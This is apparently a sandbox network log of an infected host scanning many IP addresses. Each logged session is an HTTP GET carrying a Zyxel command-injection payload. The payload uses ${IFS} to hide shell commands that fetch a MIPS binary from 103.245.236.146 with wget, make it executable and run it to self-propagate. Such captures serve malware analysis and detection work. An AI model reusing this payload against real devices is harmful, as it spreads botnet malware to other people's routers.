                                                        Jan 28, 2024 10:12:47.305607080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2984192.168.2.1460068213.179.117.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305653095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2985192.168.2.1440500191.38.46.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305679083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2986192.168.2.144475693.155.51.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305689096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2987192.168.2.143879084.62.164.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305735111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2988192.168.2.1459886149.242.247.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305777073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2989192.168.2.144804020.8.144.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305814981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2990192.168.2.1441150105.108.122.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305872917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2991192.168.2.145541278.36.162.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305922031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2992192.168.2.1452672128.68.102.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305934906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2993192.168.2.144740045.5.124.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305953979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2994192.168.2.1441460125.94.13.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306005955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2995192.168.2.1442406141.97.211.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306041956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2996192.168.2.1435112101.66.0.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306092978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2997192.168.2.14601428.116.193.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306117058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2998192.168.2.1458264164.139.70.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306190968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2999192.168.2.145975497.41.7.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306211948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3000192.168.2.145770618.243.162.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306247950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3001192.168.2.145216691.215.162.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306299925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3002192.168.2.1448874177.196.118.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306322098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3003192.168.2.144990679.37.14.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306368113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3004192.168.2.1457450105.77.182.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306410074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3005192.168.2.1440716192.98.65.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306428909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3006192.168.2.1455480171.185.224.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306480885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3007192.168.2.1432860179.233.7.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306534052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3008192.168.2.144376423.16.246.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306550026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3009192.168.2.146033678.156.157.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306566954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3010192.168.2.1433456142.106.17.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306603909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3011192.168.2.1457454118.220.126.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306638002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3012192.168.2.145969898.190.57.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306662083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3013192.168.2.1444178103.49.29.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306716919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3014192.168.2.1447640178.184.18.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306747913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3015192.168.2.144029083.29.223.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306775093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3016192.168.2.144832861.115.113.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306818962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3017192.168.2.1459632210.29.189.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306859970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3018192.168.2.1439152202.201.11.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306881905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3019192.168.2.1459026211.162.185.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306931019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3020192.168.2.1435350100.211.133.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.306958914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3021192.168.2.1438390133.175.103.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307004929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3022192.168.2.144970612.72.147.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307048082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3023192.168.2.14397704.49.175.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307096004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3024192.168.2.1456418141.141.114.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307142019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3025192.168.2.1442746191.123.191.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307188034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3026192.168.2.144111454.187.38.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307207108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3027192.168.2.143920474.217.207.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307245970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3028192.168.2.1433096167.33.153.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307280064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3029192.168.2.1452078201.246.24.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307341099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3030192.168.2.1451358198.58.147.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307377100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3031192.168.2.144474695.210.12.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307415962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3032192.168.2.1451184195.40.51.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307435989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3033192.168.2.143426452.238.47.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307476997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3034192.168.2.143691076.67.42.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307499886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3035192.168.2.1436402107.69.96.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307547092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3036192.168.2.145038067.221.252.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307600021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3037192.168.2.1440656152.90.222.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307648897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3038192.168.2.144068619.166.169.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307688951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3039192.168.2.1446464199.104.127.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307718992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3040192.168.2.145790661.235.5.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307770014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3041192.168.2.143286220.211.245.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307796001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3042192.168.2.1438204189.207.43.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307832956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3043192.168.2.1451650183.187.128.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307878017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3044192.168.2.145873680.164.224.24443
                                                        TimestampBytes transferredDirectionData
